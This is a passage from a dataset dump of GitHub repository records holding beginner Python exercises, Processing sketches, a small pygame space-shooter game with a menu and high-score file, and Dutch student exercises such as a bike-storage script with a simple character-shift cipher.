dist\ndist_a = {'a': 1, 'b': 2, 'c': 3}\n# 添加\ndist_a['d'] = 4\nprint(dist_a)\n# 删除\ndist_a.pop('d')\nprint(dist_a)\n# 修改\ndist_a['a'] = 9\nprint(dist_a)\n# 查询\nprint(dist_a['c'])\n\n# set\nset_a = set([1, 2, 3, 'a'])\nprint(set_a)\n# 添加\nset_a.add(3)\nset_a.add(4)\nprint(set_a)\n# 删除\nset_a.remove('a')\nprint(set_a)\n\n# 函数\n# 绝对值\nprint(abs(-99))\n\n# 给函数设置别名\nf = float\nprint(f(\"11.22\"))\n\n# 自定义函数\n\n\ndef my_abs(x):\n if not isinstance(x, (float, int)):\n raise TypeError(\"bad operand type\")\n if x >= 0:\n return x\n else:\n return -x\n# my_abs('123d')\n\n# 函数关键字参数\n\n\ndef person(name, age, **kw):\n if \"city\" in kw:\n print(\"city=\"+kw[\"city\"])\n print({\"name\": name, \"age\": age, \"other\": kw})\n\n\n# 函数调用\nperson(\"li\", 12, gender=\"F\", id=\"89757\", city=\"dali\")\n\n# 递归函数\n\n\ndef fetch(x):\n if x == 1:\n return 1\n else:\n return x*fetch(x-1)\n\n\n# 调用\nprint(fetch(5))\n\n\ndef fach(n):\n return fach_fach(n, 1)\n\n\ndef fach_fach(n, p):\n if n == 1:\n return p\n else:\n return fach_fach(n-1, n*p)\n\n\nprint(fach(5))\n\n\n# 去除字符首尾空格\ndef trim(s):\n if s == \"\":\n return s\n if s[0] == \" \":\n s = s[1:]\n return trim(s)\n if s[-1] == \" \":\n s = s[:-1]\n return trim(s)\n return s\n\n# 查找list中的最小和最大值\n\n\ndef findMinAndMax(L):\n if L == []:\n return (None, None)\n\n a = L[0]\n b = L[0]\n\n for n in L:\n if a > n:\n a = n\n if b < n:\n b = n\n\n return a, b\n\n\n# 列表生成式\nL1 = ['Hello', 'World', 18, 'Apple', None]\n\nL2 = [s.lower() for s in L1 if isinstance(s, str)]\n\nprint(L2)\n\n\n#生成器 杨辉三角\ndef triangles():\n\tL = [1]\n\twhile True:\n\t\tyield L\n\t\tL = [1] + [L[i - 1] + L[i] for i in range(1, len(L))] + [1]\n\n\nfor i,n in enumerate(triangles()):\n\t# if i == 10:\n\t# \tbreak\n\tprint(n)\n" } ]
1
NikolajChuguev/12345
https://github.com/NikolajChuguev/12345
bc8eda2fabd8a5b4a18c45431ff57fd51dd0ffd1
d797b57922cffe4ccbc6d582422a71421bffc1da
ea30e26ed125b86fcda7ca49ffad72c8d5faf130
refs/heads/main
2023-02-03T10:55:15.096998
2020-12-21T19:28:22
2020-12-21T19:28:22
306,263,672
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4521963894367218, "alphanum_fraction": 0.5813953280448914, "avg_line_length": 19.5, "blob_id": "f18fec8223fbe4e11f063ea8136fc549715947de", "content_id": "098d34c0f58e6c9abb92d347ad7b242cd95a2391", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 387, "license_type": "no_license", "max_line_length": 63, "num_lines": 18, "path": "/sketch_201203a.pyde", "repo_name": "NikolajChuguev/12345", "src_encoding": "UTF-8", "text": "colorr=0\r\ncolorg=0\r\ncolorb=0\r\ndef setup():\r\n size (1000,1000)\r\n background(0)\r\ndef draw(): \r\n global colorr,colorg,colorb\r\n if mouseX>450 and mouseY>450 and mouseY<550 and mouseX<550:\r\n colorr=255\r\n colorg=0\r\n colorb=0\r\n else :\r\n colorr=255\r\n colorg=255\r\n colorb=255\r\n fill(colorr,colorg,colorb)\r\n ellipse(500,500,100,100)\r\n" }, { "alpha_fraction": 0.38790035247802734, "alphanum_fraction": 0.46975088119506836, "avg_line_length": 13.61111068725586, "blob_id": "a68fbec03107a2de3682378b58a0f1749e67bf9b", "content_id": "67d0eb0aaf7071aa2bdeb4a0f04d9443a69c5a6a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 281, "license_type": "no_license", "max_line_length": 40, "num_lines": 18, "path": "/sketch_201119c.pyde", "repo_name": "NikolajChuguev/12345", "src_encoding": "UTF-8", "text": "x, y = 0, 0\r\ndim = 80.0\r\n\r\ndef setup():\r\n size(640, 360)\r\n noStroke()\r\n\r\ndef draw():\r\n global x, y\r\n background(102)\r\n\r\n x = x + 0.8\r\n if x > width + dim:\r\n x = -dim\r\n\r\n translate(x, height / 2 - dim / 2)\r\n fill(255)\r\n ellipse(-dim / 2, -dim / 2, dim, dim)\r\n" }, { "alpha_fraction": 0.2982456088066101, "alphanum_fraction": 0.3711200952529907, "avg_line_length": 25.037036895751953, "blob_id": "fc0a56538067a79f6dcdb5351336ee6822e70c00", "content_id": "7be9e7157dabf97500454ef2980817af504b85b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 741, "license_type": "no_license", "max_line_length": 52, "num_lines": 27, "path": "/sketch_201112a.pyde", "repo_name": "NikolajChuguev/12345", "src_encoding": "UTF-8", "text": "width = height = 1000\r\nny = 6\r\nnx = 6\r\nl = 100\r\nvar = 0\r\ndef setup(): \r\n size(width, height)\r\n stroke(0,128,0)\r\n noFill()\r\n frameRate(4) \r\ndef draw():\r\n global var \r\n background(192,192,192)\r\n for i in range(ny):\r\n for k in range(nx):\r\n x = ((k+1)*width/nx)-((width/nx)/2)\r\n y = ((i+1)*height/ny)-((height/ny)/2)\r\n if var == 0 :\r\n line(x, y-(l/2), x, y+(l/2))\r\n if var == 1 :\r\n rect(x-l/2, y-l/2, l, l)\r\n fill(255,255,0) \r\n if var == 2 :\r\n ellipse(x, y, l, l)\r\n fill(255,204,0) \r\n if frameCount %1 == 0 :\r\n var = (var+1)%3 \r\n \r\n" }, { "alpha_fraction": 0.3639344274997711, "alphanum_fraction": 0.4721311330795288, "avg_line_length": 16.484848022460938, "blob_id": "6d3a50923d4206fa23aa00aa96476a97edf34cb7", "content_id": "5eae96dd2889c231a30656c2a4999e0951484a5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 610, "license_type": "no_license", "max_line_length": 55, "num_lines": 33, "path": "/sketch_26_11__3.pyde", "repo_name": "NikolajChuguev/12345", "src_encoding": "UTF-8", "text": "x=1000\r\ny=1000\r\nx1=x/2\r\ny1=y/2\r\nspeed=5\r\n\r\ndef setup() :\r\n size(x,y)\r\n fill(0)\r\n\r\ndef keyPressed():\r\n global x1,y1\r\n if key == 'w':\r\n y1 = y1-speed\r\n if key == 's':\r\n y1 = y1+speed\r\n if key == 'a':\r\n x1 = 
x1-speed\r\n if key == 'd':\r\n x1 = x1+speed\r\ndef keyReleased():\r\n global x,y,x1,y1\r\n if key == ' ':\r\n x1 = random (0,x)\r\n y1 = random (0,y)\r\n background(255)\r\n ellipse(x1,y1,100,100) \r\n fill(random(0,255),random(0,255),random(0,255))\r\n\r\ndef draw():\r\n global x1,y1\r\n background(255)\r\n ellipse(x1,y1,100,100)\r\n" }, { "alpha_fraction": 0.42975205183029175, "alphanum_fraction": 0.5785123705863953, "avg_line_length": 15.285714149475098, "blob_id": "8a8c0f3596f809f5a284406a2e4a6e8f2192c62d", "content_id": "6c03c893e6a80541c3f14599f1ff22de0e32ca17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 121, "license_type": "no_license", "max_line_length": 34, "num_lines": 7, "path": "/sketch_201126a.pyde", "repo_name": "NikolajChuguev/12345", "src_encoding": "UTF-8", "text": "def setup() :\r\n size(1000,1000)\r\n fill(0)\r\n\r\ndef draw():\r\n background(255)\r\n ellipse(mouseX,mouseY,100,100)\r\n" } ]
5
BYTEic/AstroAttack
https://github.com/BYTEic/AstroAttack
96883b65ea08c9a7d4c4c2b083d38f8691843ce5
9e535c55adf62e330c0084e1c490140fa98085bd
29242bffa158d10ed3d167805259461941b6c828
refs/heads/master
2020-12-04T06:03:56.666171
2020-01-03T19:04:59
2020-01-03T19:04:59
231,646,859
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 13, "blob_id": "e7c651dc296412a59f9ec73a992f1b676e047111", "content_id": "a905b8861f065de2b59ca42cb171cf9599b04ebb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 28, "license_type": "no_license", "max_line_length": 13, "num_lines": 2, "path": "/Astro Atack!/README.md", "repo_name": "BYTEic/AstroAttack", "src_encoding": "UTF-8", "text": "# AstroAttack\n# AstroAttack\n" }, { "alpha_fraction": 0.608639121055603, "alphanum_fraction": 0.6375325322151184, "avg_line_length": 24.521072387695312, "blob_id": "37d432502abaeec01bd7e9194c13fd87c55ae3c7", "content_id": "775d6d5824289018bc4f77fbff8e67454658bd9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6990, "license_type": "no_license", "max_line_length": 147, "num_lines": 261, "path": "/Astro Atack!/main_game.py", "repo_name": "BYTEic/AstroAttack", "src_encoding": "UTF-8", "text": "import pygame\r\nimport random\r\ntry:\r\n pygame.joystick.init()\r\nexcept:\r\n pass\r\ndef getscores(row):\r\n config = open('hightscores.txt','r')\r\n lines = config.read().splitlines()\r\n return lines[row]\r\ndef setscores(lines):\r\n\twith open(\"hightscores.txt\", \"w\") as file:\r\n\t\tfor line in lines:\r\n\t\t\tfile.write(line + '\\n')\r\nwindow_size_x = 500\r\nwindow_size_y = 500\r\npygame.mixer.init(frequency=44100, size=-16, channels=1, buffer=4096)\r\npygame.init()\r\ngame = pygame.display.set_mode((window_size_x,window_size_y))\r\npygame.display.set_caption(\"Astro attack!\")\r\ngameover = False\r\nx = (500//2)-(32//2)\r\ny = 450\r\nwidth = 32\r\nheight = 32\r\nspeed = 5\r\nticks = 30\r\nrun = True\r\nleft = False\r\nright = False\r\nup = False\r\ndown = False\r\nlevel = 0\r\nbackX = 0\r\nbackY = -500\r\nlives_int = 3\r\n\r\nbullets = []\r\ndummies = []\r\n\r\nboom_sprite = pygame.image.load('sprites/boom.bmp')\r\n\r\nclass bullet_obj():\r\n\tdef __init__(self,x,y,facing,radius,color):\r\n\t\tself.x = x\r\n\t\tself.y = y\r\n\t\tself.facing = facing\r\n\t\tself.vel = 8 * facing\r\n\t\tself.radius = radius\r\n\t\tself.color = color\r\n\tdef draw(self, game):\r\n\t\tpygame.draw.circle(game,self.color, (self.x,self.y),self.radius)\r\n\r\nclass dummie_obj():\r\n\tdef __init__(self,x,y):\r\n\t\tself.x = x\r\n\t\tself.y = y\r\n\t\tself.vel = 2\r\n\tdef draw(self, game):\r\n\t\tgame.blit(dummie,(self.x,self.y))\r\n\tdef isCollide(self,x,y,width,height):\r\n\t\tif (self.x < (x + width) and (self.x + 32) > x and self.y < (y + height) and (32 + self.y) > y):\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False\r\n\tdef boom(self,game):\r\n\t\tgame.blit(boom_sprite,(self.x,self.y))\r\n\t\tpygame.display.update()\r\n\r\nscore_hud = pygame.image.load('score_hud.bmp')\r\n\r\nlives_hud = pygame.image.load('Lives_hud.bmp')\r\n\r\nRightFrame = pygame.image.load('sprites/right.bmp')\r\n\r\nLeftFrame = pygame.image.load('sprites/left.bmp')\r\n\r\nForwardFrame = pygame.image.load('sprites/up.bmp')\r\n\r\nBackwardFrame = pygame.image.load('sprites/down.bmp')\r\n\r\nIDLEframe = pygame.image.load('sprites/SpaceShip1.bmp')\r\n\r\nbackground = pygame.image.load('space.bmp')\r\n\r\ndummie = pygame.image.load('sprites/SpaceShip2.bmp')\r\nchance_dummie_do_not_spawn = 0.9\r\nbasis33 = pygame.font.Font('basis33.ttf',50)\r\nscore_int = 0\r\nclock = pygame.time.Clock()\r\nscore_ = basis33.render(str(score_int), False, (0,0,250))\r\nlives_ = 
basis33.render(str(lives_int), False, (200,0,0))\r\nscore_RectObj = score_.get_rect()\r\nscore_RectObj.center = (140, 18)\r\nmusic = 0\r\nj_check = True\r\n\r\npygame.mixer.music.load(\"sounds/m1.wav\")\r\ndef update_window():\r\n\tglobal chance_dummie_do_not_spawn\r\n\tglobal music\r\n\tglobal backX\r\n\tglobal backY\r\n\tglobal score_RectObj\r\n\tchance_dummie_do_not_spawn -= 0.0000001\r\n\tgame.blit(background,(backX,backY))\r\n\tif music == 0:\r\n\t\tpygame.mixer.music.play(99999999,0)\r\n\tif music == 9100:\r\n\t\tmusic = -1\r\n\tmusic += 1\r\n\r\n\tbackY += 0.5\r\n\tif backY == 1:\r\n\t\tbackY = -500\r\n\tfor bullet in bullets:\r\n\t\tbullet.draw(game)\r\n\tfor dummie_ in dummies:\r\n\t\tdummie_.draw(game)\r\n\tif left:\r\n\t\tgame.blit(LeftFrame,(x,y))\r\n\telif right:\r\n\t\tgame.blit(RightFrame,(x,y))\r\n\telif up:\r\n\t\tgame.blit(ForwardFrame,(x,y))\r\n\telif down:\r\n\t\tgame.blit(BackwardFrame,(x,y))\r\n\telse:\r\n\t\tgame.blit(IDLEframe,(x,y))\r\n\tscore_ = basis33.render(str(score_int), True, (0,0,250))\r\n\tlives_ = basis33.render(str(lives_int), False, (200,0,0))\r\n\tgame.blit(lives_, (480,-5))\r\n\tgame.blit(lives_hud,(350,0))\r\n\tgame.blit(score_, score_RectObj)\r\n\tgame.blit(score_hud,(0,0))\r\n\tclock.tick(ticks)\r\n\tpygame.display.update()\r\n\r\nwhile run == True:\r\n\tif j_check:\r\n\t\ttry:\r\n\t\t\tJ_but0 = joystick.get_button(0)\r\n\t\t\tJ_but1 = joystick.get_button(1)\r\n\t\texcept:\r\n\t\t\tJ_but0 = False\r\n\t\t\tJ_but1 = False\r\n\t\t\tj_check = False\r\n\tkeys = pygame.key.get_pressed()\r\n\tjoystick_count = pygame.joystick.get_count()\r\n\tfor i in range(joystick_count):\r\n\t\tjoystick = pygame.joystick.Joystick(i)\r\n\t\tjoystick.init()\r\n\t\t# Get the name from the OS for the controller/joystick\r\n\t\tname = joystick.get_name()\r\n\t\t# Usually axis run in pairs, up/down for one, and left/right for\r\n\t\t# the other.\r\n\t\taxes = joystick.get_numaxes()\r\n\t\tfor i in range(axes):\r\n\t\t\taxis = joystick.get_axis(i)\r\n\r\n\t\tbuttons = joystick.get_numbuttons()\r\n\r\n\t\tfor i in range(buttons):\r\n\t\t\tbutton = joystick.get_button(i)\r\n\t\t\t#if button[pygame.j]\r\n\r\n\t\t# Hat switch. 
All or nothing for direction, not like joysticks.\r\n\t\t# Value comes back in an array.\r\n\t\thats = joystick.get_numhats()\r\n\r\n\r\n\t\tfor i in range(hats):\r\n\t\t\that = joystick.get_hat(i)\r\n\thoriz_axis_pos= round(joystick.get_axis(0))\r\n\tvert_axis_pos= round(joystick.get_axis(1))\r\n\r\n\r\n\tif (keys[pygame.K_z] or J_but0):\r\n\t\tif len(bullets) <= 5:\r\n\t\t\tbullets.append(bullet_obj(round(x + width // 2),round(y + height // 2),1,3,(random.randint(0,255),random.randint(0,255),random.randint(0,255))))\r\n\tif (keys[pygame.K_LEFT] or horiz_axis_pos == -1) and x > 0:\r\n\t\tx -=speed\r\n\t\tleft = True\r\n\t\tright = False\r\n\t\tup = False\r\n\t\tdown = False\r\n\t\tlastMove = \"left\"\r\n\telif (keys[pygame.K_RIGHT] or horiz_axis_pos == 1) and x < window_size_x - width:\r\n\t\tx +=speed\r\n\t\tleft = False\r\n\t\tright = True\r\n\t\tup = False\r\n\t\tdown = False\r\n\t\tlastMove = \"right\"\r\n\telif (keys[pygame.K_DOWN] or vert_axis_pos == 1) and y < window_size_y - height:\r\n\t\ty+=speed\r\n\t\tleft = False\r\n\t\tright = False\r\n\t\tup = False\r\n\t\tdown = True\r\n\t\tlastMove = \"down\"\r\n\telif (keys[pygame.K_UP] or vert_axis_pos == -1) and y > 0:\r\n\t\ty -=speed\r\n\t\tleft = False\r\n\t\tright = False\r\n\t\tup = True\r\n\t\tdown = False\r\n\t\tlastMove = \"up\"\r\n\telse:\r\n\t\tleft = False\r\n\t\tright = False\r\n\t\tup = False\r\n\t\tdown = False\r\n\t\tanimCount = 0\r\n\tif random.random() > chance_dummie_do_not_spawn:\r\n\t\tdummies.append(dummie_obj(random.randint(5,500),-40))\r\n\tfor event in pygame.event.get():\r\n\t\tif event == pygame.QUIT:\r\n\t\t\trun = False\r\n\tfor bullet in bullets:\r\n\t\tif bullet.y < 500 and bullet.y > 0:\r\n\t\t\tbullet.y -= bullet.vel\r\n\t\telse:\r\n\t\t\tbullets.pop(bullets.index(bullet))\r\n\tfor dummie_ in dummies:\r\n\t\tif dummie_.y < 500 and dummie_.y > -50:\r\n\t\t\tdummie_.y += dummie_.vel\r\n\t\telse:\r\n\t\t\tdummies.pop(dummies.index(dummie_))\r\n\t\tif dummie_.isCollide(x,y,width,height):\r\n\t\t\tdummie_.boom(game)\r\n\t\t\tdummies.pop(dummies.index(dummie_))\r\n\t\t\tif lives_int == 1:\r\n\t\t\t\tif score_int < int(getscores(0)):\r\n\t\t\t\t\tif score_int < int(getscores(1)):\r\n\t\t\t\t\t\tif score_int < int(getscores(2)):\r\n\t\t\t\t\t\t\tlines = [getscores(0),getscores(1),getscores(2)]\r\n\t\t\t\t\t\t\tsetscores(lines)\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tlines = [getscores(0),getscores(1),str(score_int)]\r\n\t\t\t\t\t\t\tsetscores(lines)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tlines = [getscores(0),str(score_int),getscores(1)]\r\n\t\t\t\t\t\tsetscores(lines)\r\n\t\t\t\telse:\r\n\t\t\t\t\tlines = [str(score_int),getscores(0),getscores(1)]\r\n\t\t\t\t\tsetscores(lines)\r\n\t\t\t\traise SystemExit\r\n\t\t\telse:\r\n\t\t\t\tlives_int -= 1\r\n\t\tfor bullet in bullets:\r\n\t\t\tif dummie_.isCollide(bullet.x,bullet.y,32,32):\r\n\t\t\t\tdummie_.boom(game)\r\n\t\t\t\ttry:\r\n\t\t\t\t\tdummies.pop(dummies.index(dummie_))\r\n\t\t\t\t\tbullets.pop(bullets.index(bullet))\r\n\t\t\t\texcept ValueError:\r\n\t\t\t\t\tprint(u'Не обращайте внимание, это предупреждение о том что сразу две пули попали в объект((((')\r\n\t\t\t\tscore_int += 1\r\n\tupdate_window()\r\nrun = False\r\n" }, { "alpha_fraction": 0.5405872464179993, "alphanum_fraction": 0.5868739485740662, "avg_line_length": 27.24242401123047, "blob_id": "3850e1db6f32688c036946509bb16ce667e3edf3", "content_id": "afc305e3aef9ab4b5f0e35da241d581f253683a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2895, 
"license_type": "no_license", "max_line_length": 92, "num_lines": 99, "path": "/Astro Atack!/menu.py", "repo_name": "BYTEic/AstroAttack", "src_encoding": "UTF-8", "text": "import pygame\r\nimport time\r\nrun = False\r\npygame.joystick.init()\r\njoystick = pygame.joystick.Joystick(0)\r\njoystick.init()\r\ndef getscores_all():\r\n config = open('hightscores.txt','r')\r\n return config.read().splitlines()\r\ndef game_init__():\r\n global window_size_x\r\n window_size_x = 500\r\n global window_size_y\r\n window_size_y = 500\r\n global menuScores\r\n menuScores = False\r\n global ticks\r\n ticks = 30\r\n global clock\r\n clock = pygame.time.Clock()\r\n global run_menu\r\n run_menu = True\r\n pygame.mixer.init(frequency=44100, size=-16, channels=1, buffer=4096)\r\n pygame.init()\r\n global menu\r\n menu = pygame.display.set_mode((window_size_x,window_size_y))\r\n pygame.display.set_caption(\"Astro attack!\")\r\n global background\r\n background = pygame.image.load('menuScreen.bmp')\r\n global basis33\r\n basis33 = pygame.font.Font('basis33.ttf',40)\r\n global press_b_text\r\n press_b_text = basis33.render('PRESS B FOR GET HIGHSCORES', True, (200,200,0), (0,0,50))\r\n global HIGHTSCORES\r\n HIGHTSCORES_list = getscores_all()\r\n HIGHTSCORES = basis33.render('HIGHSCORES', False, (200,200,0))\r\n global hight0\r\n hight0 = basis33.render(HIGHTSCORES_list[0],False, (0,250,0))\r\n global hight1\r\n hight1 = basis33.render(HIGHTSCORES_list[1],False, (0,250,0))\r\n global hight2\r\n hight2 = basis33.render(HIGHTSCORES_list[2],False, (0,250,0))\r\n pygame.mixer.music.load(\"sounds/menu.wav\")\r\n global gameover_hud\r\n gameover_hud = pygame.image.load('gameover_hud.bmp')\r\n global music\r\n music = 0\r\ngame_init__()\r\n\r\ndef update_window_menu():\r\n global music\r\n menu.blit(background,(0,0))\r\n if music == 0:\r\n pygame.mixer.music.play(5,0)\r\n if music == 4000000:\r\n music = -1\r\n music += 1\r\n menu.blit(press_b_text,(0,0))\r\n if menuScores:\r\n menu.fill((0,0,0))\r\n menu.blit(HIGHTSCORES,(0,0))\r\n menu.blit(hight0,(50,50))\r\n menu.blit(hight1,(50,100))\r\n menu.blit(hight2,(50,150))\r\n clock.tick(ticks)\r\n pygame.display.update()\r\ngame_init__()\r\ncheck_j = True\r\nwhile run_menu:\r\n if check_j:\r\n try:\r\n J_but0 = joystick.get_button(0)\r\n J_but1 = joystick.get_button(1)\r\n except:\r\n J_but0 = False\r\n J_but1 = False\r\n check_j = False\r\n for event in pygame.event.get():\r\n if event == pygame.QUIT:\r\n pygame.quit()\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_z] or J_but0:\r\n try:\r\n import main_game\r\n except SystemExit:\r\n menu.blit(gameover_hud, (0,0))\r\n\r\n game_init__()\r\n\r\n if keys[pygame.K_x] or J_but1:\r\n if menuScores == False:\r\n menuScores = True\r\n time.sleep(0.2)\r\n else:\r\n menuScores = False\r\n time.sleep(0.2)\r\n\r\n update_window_menu()\r\nimport menu\r\n" } ]
3
mateusz7812/net.py
https://github.com/mateusz7812/net.py
0f69a1acba21f912e58f9255ee2ee3311adc2046
c2b8a276cf640b65b8ad6d1575b0628ae0b7d568
36aecaca6b03f6422b72839490e7ec65afb3ee9a
refs/heads/master
2018-12-12T13:36:42.509725
2018-09-13T11:23:03
2018-09-13T11:23:03
147,659,006
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.590624988079071, "alphanum_fraction": 0.659375011920929, "avg_line_length": 17.882352828979492, "blob_id": "4b600a80731e452ff9e13688d2532b3d5a70fd4e", "content_id": "b7374fe72e39297cb9ed84166f206a08bb41309b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 320, "license_type": "no_license", "max_line_length": 53, "num_lines": 17, "path": "/client.py", "repo_name": "mateusz7812/net.py", "src_encoding": "UTF-8", "text": "import socket\nimport sys\nimport time\n\nhost = '192.168.250.104'\nport = 50000\nsize = 1024\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host,port))\nsys.stdout.write('%')\n\nwhile 1:\n line = str(time.ctime(time.time())) + ' '\n s.send(line)\n data = s.recv(size)\n sys.stdout.write(data)\ns.close()" } ]
1
KristiaanSondaar/Programming2
https://github.com/KristiaanSondaar/Programming2
8b7d7fdf2c6c452ace760435f8269b94f0b85cdf
0965d63fc0865b3bf9c36544265c78fd8598ebf7
a5a1663cbdef682e2dfbf62b2d77b0a04f038d6d
refs/heads/master
2020-04-01T17:41:01.424875
2018-10-17T11:10:21
2018-10-17T11:10:21
153,444,129
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5886076092720032, "alphanum_fraction": 0.6012658476829529, "avg_line_length": 12.25, "blob_id": "10f5f75e5de91c5d07cb504dfbb843ad1e5ea522", "content_id": "07742e7838141ec585ce1486f037abfe87df5c9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 158, "license_type": "no_license", "max_line_length": 24, "num_lines": 12, "path": "/Opdrachten/6.0 Functie met (im)mutable parameter.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "def wijzig(letterlijst):\n lijst.clear()\n lijst.extend(lijst2)\n\n\nlijst = ['a','b','c']\nlijst2 = ['d', 'e', 'f']\n\n\nprint(lijst)\nwijzig(lijst)\nprint(lijst)" }, { "alpha_fraction": 0.6392694115638733, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 26.375, "blob_id": "5e260e9a780e443fe75bd8a604c2946f6a57f20a", "content_id": "859eba702704b9ac39a316932f4bd0d9d1b72898", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 219, "license_type": "no_license", "max_line_length": 74, "num_lines": 8, "path": "/Opdrachten/2.0 list and strings.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "lijst = eval(input('Geef lijst met minimaal 10 strings: '))\nlijst2 = []\nfor char in lijst:\n if len(char) == 4:\n lijst2.append(char)\n\n\nprint(\"De nieuw-gemaakte lijst met alle vier-letter strings is: \", lijst2)\n" }, { "alpha_fraction": 0.5053763389587402, "alphanum_fraction": 0.5806451439857483, "avg_line_length": 13.230769157409668, "blob_id": "9e24f7f81d92bbe829c92c0076aa5242576ec578", "content_id": "f3478ae9b47db666906d4a76bdb80f550227f54e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 186, "license_type": "no_license", "max_line_length": 42, "num_lines": 13, "path": "/Opdrachten/1. 
Formatting.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "def convert(celsius):\n return celsius * 1.8 + 32\n\n\ncelsius = 25\n\nprint(convert(celsius))\n\nprint(' F C')\n\n\nfor i in range(-30,50,10):\n print('{:5}{:5}'.format(convert(i),i))\n\n" }, { "alpha_fraction": 0.6255000233650208, "alphanum_fraction": 0.6284999847412109, "avg_line_length": 32.86440658569336, "blob_id": "dc59d3b91fb4276229b36582ea9ef1de33332ab6", "content_id": "c4b2939ebb6bfad006e42d9fec447e828997d9df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2000, "license_type": "no_license", "max_line_length": 121, "num_lines": 59, "path": "/Miniproject programming/miniproject.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "import csv\n\ndef terugomzettenASCII(omgezetteWaarde):\n lijst = list(omgezetteWaarde)\n i = 0\n omgezetteWaarde = []\n for letter in lijst:\n ASCII = ord(lijst[i]) + 3\n CHAR = chr(ASCII)\n omgezetteWaarde.append(CHAR)\n i += 1\n zin = ''.join(omgezetteWaarde)\n return zin\n\ndef omzettenASCII(omzetWaarde):\n lijst = list(omzetWaarde)\n i = 0\n omgezetteWaarde = []\n for letter in lijst:\n ASCII = ord(lijst[i]) - 3\n CHAR = chr(ASCII)\n omgezetteWaarde.append(CHAR)\n i += 1\n zin = ''.join(omgezetteWaarde)\n return zin\n\n\n\n\ndef opslaanRegistratienummer():\n with open('stalling.csv', 'r', newline='') as myCSVFile:\n reader = csv.DictReader(myCSVFile, delimiter=',')\n registratienummer = []\n wachtwoorden = []\n for row in reader:\n omgezet = terugomzettenASCII(row['uhjlvwudwlhqxpphu'])\n wachtwoordOmgezet = terugomzettenASCII(row['t^`eqtlloa'])\n registratienummer.append(omgezet)\n wachtwoorden.append(wachtwoordOmgezet)\n return registratienummer, wachtwoorden\n\ndef ophalen():\n registratienummers, wachtwoorden = opslaanRegistratienummer()\n while True:\n invoerRegistratienummer = input(\"Geef alstublieft uw registratienummer: \")\n if invoerRegistratienummer in registratienummers:\n while True:\n indexRegistratienummer = registratienummers.index(invoerRegistratienummer)\n invoerWachtwoord = input(\"Geef alstublief uw wachtwoord: \")\n if invoerWachtwoord in wachtwoorden[indexRegistratienummer]:\n print(\"U kunt uw fiets nu ophalen! 
heb een prettige dag!\")\n break\n else:\n print(\"Dit wachtwoord hoord niet bij het registratienummer dat u heeft gegeven, probeer het opnieuw\")\n else:\n print(\"Dit registratienummer is niet in gebruik, probeer het nog een keer!\")\n break\n\nophalen()\n\n\n" }, { "alpha_fraction": 0.34734514355659485, "alphanum_fraction": 0.39712390303611755, "avg_line_length": 27.28125, "blob_id": "9ba18a48a2729b5084b1df7116a2f7a5368b8005", "content_id": "6084b33b08699410f8d5bfd3be6c49ed5dd5822d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 904, "license_type": "no_license", "max_line_length": 71, "num_lines": 32, "path": "/Opdrachten/7.2 Random.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "from random import *\n\ndef monopolyworp():\n x = randint(1, 6)\n y = randint(1, 6)\n x2 = randint(1, 6)\n y2 = randint(1, 6)\n x3 = randint(1, 6)\n y3 = randint(1, 6)\n rol = x + y\n rol2 = x2 + y2\n rol3 = x3 + y3\n for i in range(0,3):\n if x == y:\n print(x,\"+\", y,\"=\", rol, \"(dubbel)\")\n print(x2,\"+\", y2,\"=\", rol2)\n break\n elif x == y and x2 == y2:\n print(x, \"+\", y, \"=\", rol, \"(dubbel\")\n print(x2, \"+\", y2, \"=\", rol2, \"dubbel\")\n print(x3, \"+\", y3, \"=\", rol3)\n break\n elif x == y and x2 == y2 and x3 == y3:\n print(x, \"+\", y, \"=\", rol, \"(dubbel\")\n print(x2, \"+\", y2, \"=\", rol2, \"(dubbel)\")\n print(x3, \"+\", y3, \"=\", rol3, \"(direct naar de gevangenis\")\n break\n else:\n print(x,\"+\", y,\"=\", rol)\n break\n\nmonopolyworp()" }, { "alpha_fraction": 0.5283018946647644, "alphanum_fraction": 0.5345911979675293, "avg_line_length": 21.14285659790039, "blob_id": "535ea4b1b8816bb75f3e291a9af33c935f3aeb54", "content_id": "d227d98002f1f31bc143b9744b06aeaa42df47a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 159, "license_type": "no_license", "max_line_length": 49, "num_lines": 7, "path": "/Opdrachten/7.3 ASCII.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "def code():\n invoerstring = input(\"Geef string: \").strip()\n 